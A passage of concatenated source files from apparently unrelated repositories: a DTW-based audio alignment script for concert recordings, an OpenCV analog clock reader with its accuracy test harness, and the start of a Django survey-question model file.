        cuts = [find_best_break(g) for g in groups]
        if all(c is None for c in cuts):
            return groups
        rebuilt = []
        for cut, group in zip(cuts, groups):
            if cut is None:
                rebuilt.append(group)
            else:
                rebuilt.append(group[:cut])
                rebuilt.append(group[cut:])
        groups = rebuilt
#split into reasonably well aligned partitions
def get_partition_bounds(points, jkey):
    """Group the DTW *points* into continuous runs, break them at poor-fit
    boundaries, and return each run reduced to [first_point, last_point]."""
    # NOTE(review): [0] keeps only the first partition group — confirm that
    # discarding the rest is intentional.
    parts = partition(split_segments2(points))[0]
    #print(jkey, 'split into', len(parts))
    part_bounds = [[p[0], p[-1]] for p in parts]
    return part_bounds
def file_length(f, lengths):
    """Look up the duration of *f* (formatted '<id>_<filename>') in the
    *lengths* mapping {id: [(filename, duration), ...]}.

    Raises KeyError for an unknown id and IndexError when no filename
    entry matches.
    """
    # Split on the FIRST underscore only so filenames that themselves
    # contain underscores stay intact (resolves the old TODO).
    id, fname = f.split('_', 1)
    return list(filter(lambda e: e[0] == fname, lengths[id]))[0][1]
def adjust_length(length, cents):
    """Scale *length* by the tempo ratio implied by a tuning offset in cents."""
    ratio = 2 ** (cents / 1200)
    return length / ratio
def plotFigure(segs, json_key, lengths, fname, dtw, jsons):
    """Plot alignment segments as straight line pieces and save the figure
    to ``fname + '.pdf'``.

    Segments carrying a colour tag (index 2) are drawn in that colour; the
    except branch handles untagged segments, drawing them in blue.
    """
    p = plt.figure()
    for s in segs:
        #print(s[0], s[1])
        try:
            colour = s[2]
            plt.plot([s[0][0], s[1][0]], [s[0][1], s[1][1]], color=colour, alpha=0.5)
        except:
            # No colour tag: locate the segment's span in the raw dtw path
            # (start/end are kept for the commented-out variants below).
            end = dtw.index(s[1]) + 1
            start = dtw.index(s[0])
            #sdtw = np.array(dtw)[start:end]
            #plt.plot(sdtw[:,0], sdtw[:,1], color='b', alpha=0.5) # plot all values from dtw between start and end
            plt.plot([s[0][0], s[1][0]], [s[0][1], s[1][1]], color='b', alpha=0.5) # plot line from start to end
            #x = sdtw[:,0]
            #y = sdtw[:,1]
            #coef = np.polyfit(x,y,1)
            #poly1d_fn = np.poly1d(coef)
            #plt.plot(x, poly1d_fn(x), color='b', alpha=0.5) # plot linear regression line of dtw segment
            #ratio = 1 / 2**(jsons[json_key]['tuning_diff'] / 1200)
            #len1 = s[1][0] - s[0][0]
            #print(len1)
            #print(ratio)
            #plt.plot([s[0][0], s[1][0]], [s[0][1], s[0][1] + len1 * ratio], color='b', alpha=0.5)
            #sys.exit()
            '''
            # use all points of dtw?
            if colour == 'r':
                pass
                #plt.plot([s[0][0], s[1][0]], [s[0][1], s[1][1]], color=colour, alpha=0.5)
            else:
                points = dtw[dtw.index([s[0][0], s[1][0]]):dtw.index([s[0][1], s[1][1]])]
                print(points)
            '''
            #break
    plt.tight_layout()
    p.savefig(fname+'.pdf', bbox_inches='tight')
    plt.close(p)
def fill_gaps(json_key, segs, lengths, tuning_diff):
    """Insert red ('r'-tagged) gap segments so the alignment covers the
    whole first file: one before each segment, starting at the previous
    segment's end, and one after the final segment up to the file's full
    duration. Gap slopes are corrected by *tuning_diff* (cents)."""
    #tuning_diff = jsons[json_key]['tuning_diff']
    #print(segs)
    new_segs = copy(segs)
    for n, s in enumerate(segs):
        if n == 0:
            start = 0
        else:
            start = segs[n-1][1][0]
        end = s[0][0]
        # Inferred (not measured) segment bridging the gap into s.
        pre_seg = [[[start, s[0][1]-adjust_length(end-start, tuning_diff)], [s[0][0], s[0][1]], 'r']]
        new_segs = pre_seg + new_segs
        #print(n, pre_seg)
        if n == len(segs)-1:
            # Trailing gap from the last segment to the end of file 0.
            fname_0 = json_key.split('__')[0]
            l_0 = file_length(fname_0, lengths)
            #print(l_0)
            app_seg = [[[s[1][0], s[1][1]], [l_0, s[1][1]+adjust_length(l_0-s[1][0], tuning_diff)], 'r' ]]
            new_segs += app_seg
            #print(n, app_seg)
    return sorted(new_segs, key=lambda s: s[0][0])
'''
def linReg(partitions):
print(partitions)
p = [[i for i in j] for j in partitions[0]]
init_slope, intercept, init_r_value, p_value, std_err = stats.linregress(np.swapaxes(p[0],0,1))
print('first', init_slope, init_r_value**2)
for n, i in enumerate(p[:-1]):
q = np.swapaxes(np.vstack(p[n:n+2]),0,1)
slope, intercept, r_value, p_value, std_err = stats.linregress(q)
#print(q)
print(n, slope, r_value**2)
#test: 2nd segment with 10s jump:
q[1][2:] += 10
slope, intercept, r_value, p_value, std_err = stats.linregress(q)
#print(q)
print('test', slope, r_value**2)
'''
'''
def process_chain_BAK(c, all_partitions, partition_jkeys):
#pprint(partition_jkeys)
#return
translation = []
# try for length 2 only:
for i, t in enumerate(c[1][:-1]):
jk = track_tuple_to_json_id((t, c[1][i+1]))
translation.append(all_partitions[partition_jkeys.index(jk)])
json.dump(translation, open('translation.json', 'w'))
first_seg = translation[0][2][:2]
print()
print('original: ', first_seg)
inter = translation[1]
match_start_seg = list(filter(lambda x: x[0][0] <= first_seg[0][1] <= x[1][0], inter))[0]#[:2]
match_end_seg = list(filter(lambda x: x[0][0] <= first_seg[1][1] <= x[1][0], inter))[0]#[:2]
start_chain = [match_start_seg]
end_chain = [match_end_seg]
def map_seg(p, s):
prop = (p - s[0][0]) / (s[1][0] - s[0][0])
return prop * (s[1][1] - s[0][1]) + s[0][1]
def map_chain(seg, chain):
for s in chain:
seg = [seg[0], map_seg(seg[1], s)]
return seg
start_to_ref = map_chain(first_seg[0], start_chain)
end_to_ref = map_chain(first_seg[1], end_chain)
print('start seg: ', match_start_seg)
print('end seg: ', match_end_seg)
print('new seg: ', start_to_ref, end_to_ref)
'''
# TODO: test for chains > 2
def process_chain(c, all_partitions, partition_jkeys, jsons, lengths):
    """Compose two pairwise alignments along chain *c* into a direct
    alignment from c[0] to c[-1].

    Appends the composed alignment to *all_partitions* / *partition_jkeys*,
    dumps it to new_segments.json, plots it to chain_test/, and returns the
    updated (all_partitions, partition_jkeys).
    """
    def map_seg(p, s):
        # Linearly interpolate position p through segment s.
        prop = (p - s[0][0]) / (s[1][0] - s[0][0])
        return prop * (s[1][1] - s[0][1]) + s[0][1]
    print()
    print()
    print(c)
    #c = [c[0]] + c[-2:]
    jk1 = track_tuple_to_json_id((c[0], c[1]))
    jk2 = track_tuple_to_json_id((c[1], c[-1]))
    translation = [all_partitions[partition_jkeys.index(jk1)], all_partitions[partition_jkeys.index(jk2)]]
    new_segments = []
    for s in translation[0]:
        prepend = False
        append = False
        seg = s[:2]
        print('original: ', seg)
        # if start[0][1] < 0 or start[1][1] > length the first/last segment is extended. tuning_diff instead?
        search_segment = list(filter(lambda x: x[0][0] <= seg[0][1] <= x[1][0], translation[1]))
        if search_segment:
            match_start_seg = search_segment[0][:2]
        else:
            print('prepend to ', translation[1][0][:2])
            match_start_seg = translation[1][0][:2]
            prepend = True
        search_segment = list(filter(lambda x: x[0][0] <= seg[1][1] <= x[1][0], translation[1]))
        if search_segment:
            match_end_seg = search_segment[-1][:2]
        else:
            print('append to ', translation[1][-1][:2])
            match_end_seg = translation[1][-1][:2]
            append = True
        # Tag: 'cp' chained+prepended, 'ca' chained+appended, 'c' chained.
        if prepend:
            stype = 'cp'
        elif append:
            stype = 'ca'
        else:
            stype = 'c'
        start_to_ref = [seg[0][0], map_seg(seg[0][1], match_start_seg)]
        end_to_ref = [seg[1][0], map_seg(seg[1][1], match_end_seg)]
        new_segment = [start_to_ref, end_to_ref, stype]
        new_segments.append(new_segment)
        print('new seg: ', new_segment)
        print()
    #sys.exit()
    new_jkey = track_tuple_to_json_id((c[0], c[-1]))
    print(new_jkey)
    json.dump(new_segments, open('new_segments.json', 'w'))
    all_partitions.append(new_segments)
    partition_jkeys.append(new_jkey)
    p = plt.figure()
    for s in new_segments:
        plt.plot([s[0][0], s[1][0]], [s[0][1], s[1][1]], color='b', alpha=0.5)
    plt.tight_layout()
    p.savefig('chain_test/'+new_jkey+'.pdf', bbox_inches='tight')
    plt.close(p)
    return all_partitions, partition_jkeys
# remove intermediate chain alignments from result
def cleanResult(subgraphs, all_partitions, partition_jkeys):
    """Drop alignments that were only intermediate links in a chain
    (match entries of length > 1) from both parallel lists, in place."""
    for sub in subgraphs:
        chain_entries = [e for e in list(sub.values())[0] if len(e) > 1]
        for entry in chain_entries:
            key = track_tuple_to_json_id((entry[0], entry[1]))
            pos = partition_jkeys.index(key)
            print(pos, key)
            del partition_jkeys[pos]
            del all_partitions[pos]
    return all_partitions, partition_jkeys
def main():
    """Build pairwise alignment partitions for every subgraph of DATE's
    recordings, compose chained alignments into direct ones, and dump the
    final mapping {json_key: segments} to all_partition.json."""
    subgraphs, ids_by_length, ids_by_number_of_matched_files, lengths, jsons = prepare_data(DATE)
    subgraphs = sort_subgraphs(subgraphs, lengths, ids_by_length)
    #file_length('116746_gd1990-03-14s1t02.flac', lengths)
    #json.dump(jsons, open('jsons.json', 'w'))
    #json.dump(lengths, open('lengths.json', 'w'))
    #json.dump(subgraphs, open('subgraphs.json', 'w'))
    #sys.exit()
    all_partitions = []
    partition_jkeys = []
    for sub in subgraphs:
        chains = [] # json keys of chained alignments
        sub_partitions = []
        for s in list(sub.values())[0]:
            #if len(s) > 1:
            if len(s) > 1:
                # Indirect match: remember the chain, resolve after the loop.
                jkey = track_tuple_to_json_id((s[0], s[1]))
                chains.append(s + list(sub.keys()))
            else:
                jkey = track_tuple_to_json_id((s[0], list(sub.keys())[0]))
                dtw = jsons[jkey]['dtw']
                dtw = [[x[1], x[0]] for x in dtw] #swap columns to match order of file names/lengths
                tuning_diff = jsons[jkey]['tuning_diff']
                partitions = get_partition_bounds(dtw, jkey)
                partitions = fill_gaps(jkey, partitions, lengths, jsons[jkey]['tuning_diff'])
                all_partitions.append(partitions)
                partition_jkeys.append(jkey)
                target_folder = os.path.join('plots', DATE)
                if not os.path.exists(target_folder):
                    os.mkdir(target_folder)
                fname = f'{target_folder}/{jkey}'
                #print(fname)
                #json.dump(sorted(partitions, key=lambda x: x[0][0]), open(fname+'.json', 'w'))
                #sys.exit()
                #plotFigure(partitions, jkeys[0], lengths, fname, dtw, jsons)
            #break
        for c in chains:
            all_partitions, partition_jkeys = process_chain(c, all_partitions, partition_jkeys, jsons, lengths)
        #break
        #json.dump(all_partitions, open('all_partition.json', 'w'))
        #break
    all_partitions, partition_jkeys = cleanResult(subgraphs, all_partitions, partition_jkeys)
    result = {}
    for key, value in zip(partition_jkeys, all_partitions):
        result[key] = value
    result['unmatched'] = jsons['unmatched']
    json.dump(result, open('all_partition.json', 'w'))
    #json.dump(result, open('all_partition.json', 'w'))
    #pprint(partition_jkeys)
    #timelines =
    #plot_timelines(timelines, names, outfile)
    '''
    #find overlaps in reference
    for j, p in enumerate(all_partitions):
        for i in range(len(p)):
            if i > 0 and p[i-1][1][1] > p[i][0][1]+1: #starts earlier on the y axis
                #there's an overlap
                print(partition_jkeys[j])
                print(p[i-1], p[i])
                print()
    '''
    #all_partitions = linReg(all_partitions)
    #with open(jkeys[0] + '.txt', 'w') as sfile:
        #.l pprint(all_partitions[0], sfile)
    #plotFigure(all_partitions[0], jkeys[0], lengths)
    #d = find_dupes(subgraphs)
    #pprint('dupes:', d)
main()
'''
{
"116746_gd1990-03-14s1t02.flac": [
["116030_GD90-03-14d1t02.flac"],
["89689_gd1990-03-14d1t01.flac"],
["83778_gd1990-03-14d1t02.flac", "116030_GD90-03-14d1t02.flac"],
["125852_gd1990-03-14.Nak300.t01.flac", "89689_gd1990-03-14d1t01.flac"]
]
}
'''
|
{"/align1.py": ["/prepare.py"]}
|
34,492
|
msheroubi/AnalogClockReader
|
refs/heads/master
|
/MS_ClockReader.py
|
import numpy as np
import cv2
import math
from PIL import ImageGrab
import time
from skimage.transform import (hough_line, hough_line_peaks,
probabilistic_hough_line)
from skimage.feature import canny
from skimage import data
"""
============================================================================================================
READING TIME OFF ANALOG CLOCKS FROM IMAGES/VIDEO
Video frames have to be fed one at a time into the loop at the bottom, where the view of the clock does not change in the video.
'###' signifies deprecated/old code used
============================================================================================================
"""
## prevRoi: used to store previous ROI incase the roi detection fails, during the loop, it uses the previous ROI which should be the clock
prevRoi = [[0,0],[1,0],[1,1],[0,1]]
clockCenter = (0,0)
## glob_* : used to store properties of the clockhands
glob_clockhands = [[], []]
glob_lineCoords = [(), ()];
## DEPRECATED
##As of April 2nd, this wasn't used. This was used to draw lines when using OpenCv's Hough Lines
def draw_lines(img, lines):
    """Draw every detected Hough line onto *img* and return it.

    BUG FIX: the previous version returned from inside the loop, so only
    the first line was ever drawn; it also swallowed all exceptions with a
    bare ``except``. Now all lines are drawn and only the expected failure
    modes (lines is None / malformed entries) are ignored, keeping the
    original best-effort behavior of returning None on failure.
    """
    try:
        for line in lines:
            coords = line[0]
            img = cv2.line(img, (coords[0], coords[1]), (coords[2], coords[3]), [255, 255, 255], 3)
        return img
    except (TypeError, IndexError):
        pass
##Get region of interest given an image and vertices and returns a masked image where anywhere outside the ROI is black
def roi(img, vertices):
    """Black out everything in *img* outside the polygon(s) in *vertices*."""
    stencil = np.zeros_like(img)
    # Fill the ROI polygon with white, then AND against the source so only
    # pixels inside the polygon survive.
    cv2.fillPoly(stencil, vertices, 255)
    return cv2.bitwise_and(img, stencil)
## DEPRECATED
##As of April 2nd, this wasn't used. This was used to generate automatic threshholds for an image using a sigma value and the median of the image array
def auto_canny(image, sigma=0.33):
    """Run Canny edge detection with thresholds derived from the image median."""
    median = np.median(image)
    low = int(max(0, (1.0 - sigma) * median))
    high = int(min(255, (1.0 + sigma) * median))
    return cv2.Canny(image, low, high)
## BULK OF IMAGE PROCESSING
## Takes an input image, retrieves the ROI, get clock hands, store properties of clockhands in global variables glob_lineCoords & glob_clockhands, return image with lines on it
## -This process is run a few times to make sure the probabilistic huogh transform gets both clock hands
def process_img(original_image):
    """Detect the clock face and its hands in *original_image*.

    Side effects: updates the module globals prevRoi, clockCenter,
    glob_lineCoords and glob_clockhands, and draws the detected hand lines
    onto the input image, which is also returned.
    """
    #See top for var explanations
    global prevRoi
    global clockCenter
    global glob_lineCoords
    global glob_clockhands
    processed_img = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)
    output = original_image.copy()
    # detect circles in the image
    circles = cv2.HoughCircles(processed_img, cv2.HOUGH_GRADIENT, 1.1, 100, maxRadius=300)
    #Dimensions of ROI
    roiDim = []
    # ensure at least some circles were found
    if circles is not None:
        # convert the (x, y) coordinates and radius of the circles to integers
        circles = np.round(circles[0, :]).astype("int")
        # loop over the (x, y) coordinates and radius of the circles
        maxR = 0
        for (x, y, r) in circles:
            # draw the circle in the output image, then draw a rectangle
            # corresponding to the center of the circle
            cv2.circle(output, (x, y), r, (0, 255, 0), 4)
            cv2.rectangle(output, (x - 5, y - 5), (x + 5, y + 5), (0, 128, 255), -1)
            clockCenter=(x,y)
            # Keep the ROI of the largest circle, padded by 5px on each side.
            if(r > maxR):
                roiDim = [[x-r-5, y-r-5], [x+r+5, y-r-5], [x+r+5, y+r+5],[x-r-5, y+r+5]]
                prevRoi = roiDim
    if len(roiDim) == 0:
        # Circle detection failed: fall back to the last successful ROI.
        roiDim = prevRoi
    ##-----------------DEPRECATED
    ###kernel = np.ones((3,3),np.uint8)
    ###processed_img = cv2.erode(processed_img,kernel,iterations = 1)
    ###processed_img = auto_canny(processed_img)
    ###processed_img = cv2.GaussianBlur(processed_img, (3, 3), 0)
    ###edges = cv2.Canny(processed_img,50, 150, apertureSize=3)
    ###edges = cv2.morphologyEx(edges, cv2.MORPH_CLOSE, kernel)
    #see ROI notes in notebook
    vertices = np.array(roiDim)
    processed_img = roi(processed_img, [vertices])
    minLineLength = 50
    maxLineGap = 3
    #each hand has a x0,x1,y0,y1 and an angle where 0 is hours, 1 is minutes, 2 is seconds
    edges = cv2.Canny(processed_img, 50, 200)
    ###edges = auto_canny(processed_img)
    kernel = np.ones((6,6),np.uint8)
    edges = cv2.morphologyEx(edges, cv2.MORPH_CLOSE, kernel)
    ###edges = cv2.morphologyEx(edges, cv2.MORPH_OPEN, np.ones((2,2), np.uint8))
    lines = probabilistic_hough_line(edges, threshold=5, line_length=minLineLength, line_gap=maxLineGap)
    ##------------------DEPRECATED
    ###lines = cv2.HoughLines(edges, 1, np.pi/180, 60)
    ###lines = cv2.HoughLinesP(edges, 1, np.pi/180, 60, minLineLength, maxLineGap)
    #clockhands = [[(0,0), (1,1), np.pi], [(0,0), (q1,1), np.pi], [(0,0), (1,1), np.pi]]
    #maxLine = 0
    #minLine = 1000
    lineCoords = [[]]
    x, y = clockCenter
    lineAngs = []
    newAng = True
    maxima1 = 0
    maxima2 = 0
    #Placeholder for blob detection, checks if root of line is within a set distance of the center
    distCenter = 15
    ###clockhands = [0, 0]
    if lines is not None:
        for line in lines:
            ### for x1,y1,x2,y2 in line: #For OpenCv's HoughLinesP
            p0, p1 = line
            x1, y1 = p0
            x2, y2 = p1
            #Makes the point closest to the center is x1 y1
            if(abs(y2 - y) < abs(y1 - y) and abs(x2-x) < abs(x1-x)):
                temp = x1
                x1 = x2
                x2 = temp
                temp = y1
                y1 = y2
                y2 = temp
            lenLine = ((x2-x1) ** 2 + (y2-y1) ** 2) ** 0.5
            # Accept only lines rooted near the clock center and long enough
            # to be a hand.
            if(((abs(x-x1) < distCenter and abs(y-y1) < distCenter) or (abs(x-x2) < distCenter and abs(y-y2) < distCenter)) and lenLine > minLineLength):
                lineCoords.append([(x1,y1), (x2,y2)])
                ###ang = np.arctan2((y1-y2),(x2-x1))
                #Bottom of screen = max(y), rotate unit circle to match the clock
                ang = np.arctan2((x2-x1),(y1-y2))
                ang = ang * 180 / math.pi
                ang = (ang + 360) % 360 #Convert angle to extend range from [-180, 180] to [0, 360]
                #Check if angle of line is already stored
                for lineAng in lineAngs:
                    if(abs(ang- lineAng) <= 5): #use 5, since 6 degrees is one tick on the clock
                        newAng = False #Keep False
                ## -------------------DEPRECATED
                ### if(lenLine > maxima1 and newAng):
                ###     maxima1 = lenLine
                ###     clockhands[0] = ang
                ### elif(lenLine > maxima2 and newAng):
                ###     maxima2 = lenLine
                ###     clockhands[1] = ang
                #Checks if angle is a new angle
                if(newAng):
                    lineAngs.append(ang)
                cv2.line(original_image,(x1,y1),(x2,y2),(0,0,255),2) #Draw line
                ##If ClockHands are empty, and angles are different from existing angles, save line properties
                if(len(glob_clockhands[0]) == 0):
                    glob_clockhands[0] = [ang, lenLine]
                    glob_lineCoords[0] = [(x1,y1), (x2,y2)]
                elif(len(glob_clockhands[1]) == 0):
                    if(abs(ang - glob_clockhands[0][0]) > 10):
                        glob_clockhands[1] = [ang, lenLine]
                        glob_lineCoords[1] = [(x1,y1), (x2,y2)]
                else:
                    #If both clockhand slots are full, check if the angular difference between the current angle is bigger than the other two, replace with the bigger angular difference
                    if(abs(ang - glob_clockhands[0][0]) > abs(glob_clockhands[0][0] - glob_clockhands[1][0]) + 5 and abs(ang - glob_clockhands[0][0]) < 350):
                        glob_clockhands[1] = [ang, lenLine]
                        glob_lineCoords[1] = [(x1,y1), (x2,y2)]
                    elif(abs(ang - glob_clockhands[1][0]) > abs(glob_clockhands[1][0] - glob_clockhands[0][0]) + 5 and abs(ang - glob_clockhands[0][0]) < 350):
                        glob_clockhands[0] = [ang, lenLine]
                        glob_lineCoords[0] = [(x1,y1), (x2,y2)]
                    elif(abs(ang - glob_clockhands[0][0]) < abs(glob_clockhands[0][0] - glob_clockhands[1][0]) + 5):
                        # Same direction as hand 1: keep the longer line.
                        if(lenLine > glob_clockhands[1][1] and (abs(ang - glob_clockhands[1][0]) < 10 or abs(ang - glob_clockhands[1][0]) > 350)):
                            glob_clockhands[1] = [ang, lenLine]
                            glob_lineCoords[1] = [(x1,y1), (x2,y2)]
                    elif(abs(ang - glob_clockhands[1][0]) < abs(glob_clockhands[1][0] - glob_clockhands[0][0]) + 5):
                        # Same direction as hand 0: keep the longer line.
                        if(lenLine > glob_clockhands[0][1] and (abs(ang - glob_clockhands[0][0]) < 10 or abs(ang - glob_clockhands[0][0]) > 350)):
                            glob_clockhands[0] = [ang, lenLine]
                            glob_lineCoords[0] = [(x1,y1), (x2,y2)]
    ##-----------------------------------------DEPRECATED
    # elif(newAng):
    #     #If both clockhand slots are full, check if the angular difference between the current angle is bigger than the other two, replace with the bigger angular difference
    #     if(abs(ang - glob_clockhands[0][0]) > abs(glob_clockhands[0][0] - glob_clockhands[1][0]) + 5 and abs(ang - glob_clockhands[0][0]) < 350):
    #         glob_clockhands[1] = [ang, lenLine]
    #         glob_lineCoords[1] = [(x1,y1), (x2,y2)]
    #     elif(abs(ang - glob_clockhands[1][0]) > abs(glob_clockhands[1][0] - glob_clockhands[0][0]) + 5 and abs(ang - glob_clockhands[1][0]) < 350):
    #         glob_clockhands[0] = [ang, lenLine]
    #         glob_lineCoords[0] = [(x1,y1), (x2,y2)]
    #     elif(abs(ang - glob_clockhands[0][0]) < abs(glob_clockhands[0][0] - glob_clockhands[1][0]) + 5 and abs(ang - glob_clockhands[0][0]) < 350):
    #         if(lenLine > glob_clockhands[1][1]):
    #             glob_clockhands[1] = [ang, lenLine]
    #             glob_lineCoords[1] = [(x1,y1), (x2,y2)]
    #     elif(abs(ang - glob_clockhands[1][0]) < abs(glob_clockhands[1][0] - glob_clockhands[0][0]) + 5 and abs(ang - glob_clockhands[1][0]) < 350):
    #         if(lenLine > glob_clockhands[0][1]):
    #             glob_clockhands[0] = [ang, lenLine]
    #             glob_lineCoords[0] = [(x1,y1), (x2,y2)]
    ### else:
    ###     for i in range(0, len(glob_clockhands)):
    ###         if(abs(abs(glob_clockhands[i][0]) - abs(ang))>5)
    ##------------------DEPRECATED
    # for rho,theta in line: #For OpenCv's HoughLines
    #     a = np.cos(theta)
    #     b = np.sin(theta)
    #     x0 = a*rho
    #     y0 = b*rho
    #     x1 = int(x0 + 1000*(-b))
    #     y1 = int(y0 + 1000*(a))
    #     x2 = int(x0 - 1000*(-b))
    #     y2 = int(y0 - 1000*(a))
    #     lenLine = ((x2-x1) ** 2 + (y2-y1) ** 2) ** 0.5
    #     if(abs(x-x1) < 25 and abs(y-y1) < 25):
    #         cv2.line(processed_img,(x1,y1),(x2,y2),(0,255,0),2)
    ##----------------------DEPRECATED
    #kernel = np.ones((5,5),np.uint8)
    #edges = cv2.morphologyEx(edges, cv2.MORPH_CLOSE, kernel )
    #lines = cv2.HoughLinesP(edges, 1, np.pi/180,10,100, minLineLength, maxLineGap)
    #newIm = draw_lines(np.zeros(processed_img.shape), lines)
    return original_image
##Compute time based on angles and return time in a list of the form [HH, mm, ss]
def computeTime(ang_H, ang_M, ang_S=0):
    """Convert hand angles (degrees clockwise from 12 o'clock) to [HH, mm].

    Each clock tick is 6 degrees; the hour hand moves 30 degrees per hour.
    The rounded vs. floored hour readings are compared to correct borderline
    hand positions near an hour mark.
    """
    minutes = round(abs(ang_M) / 6)
    seconds = round(abs(ang_S) / 6)
    rounded_hours = round((abs(ang_H) / 6) / 5)  # nearest hour mark
    hours = (abs(ang_H) / 6) // 5                # floored hour reading
    # Carry overflow from seconds into minutes.
    if seconds == 60:
        minutes += 1
        seconds = 0
    if minutes == 60:
        hours += 1
        minutes = 0
    elif minutes < 30 and rounded_hours != hours:
        # Early in the hour but the rounded reading jumped ahead: the hour
        # hand was misread low, so trust the rounded value.
        hours += 1
    elif minutes > 45 and rounded_hours == hours:
        # Late in the hour the hand sits near the next mark; step back.
        hours -= 1
    # Wrap 0 (or negative after the correction) onto the 12-hour dial.
    if hours <= 0:
        hours = 12 + hours
    ###return [int(HH), int(mm), int(ss)]
    return [int(hours), int(minutes)]
#Convert time from previous function into a string of the form HH:mm:ss
def timeToString(temp):
    """Format a [HH, mm(, ss)] list as a colon-separated string.

    Improvement: builds the string with a generator + join instead of
    converting the caller's list elements to str in place (the old version
    mutated its argument as a side effect).
    """
    return ":".join(str(part) for part in temp)
def main(imname):
    """Read image *imname* and run hand detection numIterations times (the
    probabilistic Hough transform is stochastic, so repeated passes help
    find both hands), then compute the time.

    When imported as a module, returns [HH, mm] (or None on failure);
    when run as a script, prints the time and shows the annotated image.
    """
    last_time = time.time()
    count = 0
    screen = None
    numIterations = 20
    while(count < numIterations):
        count += 1
        """
        ------------------------------------------------------------------------------
        $CHOOSE IMAGE INPUT HERE$
        Set screen to be input image; imread, ImageGrab, etc...
        Feed it one frame at a time
        """
        #screen = ImageGrab.grab(bbox=(0, 100, 750, 600)) #x, y, w , h | Screen capture input
        #runBool = True
        screen = cv2.imread(imname)
        if(screen is None):
            print('File Not Found')
            return
        ###screen_np= cv2.resize(np.array(screen), (960,540))
        screen_np = np.array(screen)
        new_screen = process_img(screen_np)
        #print('Loop took {} seconds'.format(time.time() -last_time))
        #last_time = time.time()
        if __name__ == '__main__':
            try:
                cv2.imshow('window', new_screen)
            except:
                print("Imshow error")
            if cv2.waitKey(25) & 0xFF == ord('q'):
                cv2.destroyAllWindows()
                break
    #Show final image with lines on it
    screen_np = np.array(screen)
    original_image = screen_np.copy()
    #print(glob_clockhands)
    if(len(glob_clockhands[1]) ==0):
        if __name__ == '__main__':
            print("Could not detect all clock hands")
    else:
        for line in glob_lineCoords:
            cv2.line(screen_np,line[0],line[1],(0,0,255),2)
        ang_H = 0
        ang_M = 0
        # The longer of the two detected hands is the minute hand.
        if(glob_clockhands[0][1] > glob_clockhands[1][1]):
            ang_H = glob_clockhands[1][0]
            ang_M = glob_clockhands[0][0]
        else:
            ang_H = glob_clockhands[0][0]
            ang_M = glob_clockhands[1][0]
        clocktime = computeTime(ang_H, ang_M)
        if __name__ == '__main__':
            print(timeToString(clocktime))
        if not __name__ == '__main__':
            return clocktime
    #---USE THIS TO VIEW OUTPUT OF THE IMAGE
    if __name__ == '__main__':
        final = np.concatenate((original_image, screen_np), axis=1)
        try:
            cv2.imshow('window', final)
        except:
            print("Imshow error")
        cv2.waitKey()
        cv2.destroyAllWindows()
if __name__ == '__main__':
main('clock20.jpg')
|
{"/clockTest.py": ["/MS_ClockReader.py"]}
|
34,493
|
msheroubi/AnalogClockReader
|
refs/heads/master
|
/clockTest.py
|
import MS_ClockReader
import importlib
import time
'''
=========================================================================
CLOCK TEST FILE-this test file is not a 100% accurate in its FALSE (X) readings,
for false readings, if you run the main file (MS_ClockReader)
with the image that failed, aside from clock10/clock16/clock20/clock22,
which are examples of limitations, every other image should have more than 50% accuracy
I am not sure why, I need to reload the ClockReader file often for it to keep working, it seems fine as of right now,
but just incase you run it and get different results, that's why.
=========================================================================
'''
times = {'clock1.jpg': [10, 10],
'clock2.jpg': [10,11],
'clock3.jpg': [10,10],
'clock4.jpg': [1,50],
'clock5.jpg': [10,10],
'clock6.jpg': [10,10],
'clock7.jpg': [1,50],
'clock8.jpg': [1,50],
'clock9.jpg': [2,58],
'clock10.jpg': [10,10],
'clock11.jpg': [8,22],
'clock12.jpg': [12,12],
'clock13.jpg': [6,53],
'clock14.jpg': [10,10],
'clock15.jpg': [10,10],
'clock16.jpg': [9,5],
'clock17.jpg': [10,10],
'clock18.jpg': [10,25],
'clock19.jpg': [1,50],
'clock20.jpg': [10,10],
'clock21.jpg': [3,0],
'clock22.jpg': [6,10],
'clock23.jpg': [10,29],
'clock24.jpg': [1,50],
'clock25.jpg': [1,50],
'clock26.jpg': [3,0],
'clock27.jpg': [11,5],
'clock28.jpg': [3,39],
'clock29.jpg': [10,10],
'clock30.jpg': [10,8] }
totalCount = 0
totalSuccess = 0
numFiles = 30
loopsPerFile =10
errThresh = 5
# Run every test image loopsPerFile times (detection is stochastic) and
# report per-file accuracy; a reading counts as correct when the hour
# matches exactly and the minutes are within errThresh.
for i in range(1, numFiles + 1):
    filename = 'clock' + str(i) +'.jpg'
    numSuccess = 0
    count = 0
    realHour = times[filename][0]
    realMinute = times[filename][1]
    print(filename, end="| ")
    while(count < loopsPerFile):
        count += 1
        totalCount += 1
        clocktime = MS_ClockReader.main(filename)
        if(clocktime is None):
            # Reader returned nothing (file missing or hands not detected).
            print('?', end="")
            continue
        # print(realHour," ", realMinute)
        # print(time)
        hour = clocktime[0]
        minutes = clocktime[1]
        if(hour == realHour and abs(minutes - realMinute) < errThresh):
            numSuccess += 1
            totalSuccess += 1
            print('Y', end="")
        else:
            print('X', end="")
        # Reload to reset the reader's module-level detection globals
        # (prevRoi, glob_clockhands, ...) between runs.
        importlib.reload(MS_ClockReader)
    importlib.reload(MS_ClockReader)
    print(" | Accuracy: ", (round(numSuccess/count * 100)))
|
{"/clockTest.py": ["/MS_ClockReader.py"]}
|
34,502
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/client/models.py
|
from django.db import models
from ts.models import Clients
class SurveyQuestion(models.Model):
    """A survey question belonging to one client company."""
    # Question type codes: 1 = free-text answer, 2 = single choice.
    QTYPES = ((1, 'TEXT'), (2, 'CHOICE'))
    # Owning client; questions are deleted with their client.
    company_id = models.ForeignKey(Clients, on_delete=models.CASCADE)
    ques_id = models.AutoField(primary_key=True)
    ques_category = models.CharField(default="GENERAL", max_length=255)
    ques_type = models.IntegerField(default=1, choices=QTYPES)
    ques_text = models.CharField(max_length=255)
    # NOTE(review): purpose of the meta fields is not evident from this
    # file — confirm against the views that populate them.
    ques_meta_1 = models.CharField(max_length=255)
    ques_meta_2 = models.CharField(max_length=255)
    def __str__(self):
        # Prefix with the client name so questions from different clients
        # are distinguishable in the admin.
        return self.company_id.client_name + ": " + self.ques_text
        #return self.ques_text
class SurveyQuestionChoice(models.Model):
    """One selectable answer option for a CHOICE-type SurveyQuestion."""
    company_id = models.ForeignKey(Clients, on_delete=models.CASCADE)
    ques_id = models.ForeignKey(SurveyQuestion, on_delete=models.CASCADE)
    choice_text = models.CharField(max_length=255)
    def __str__(self):
        # Include the parent question text for context in the admin.
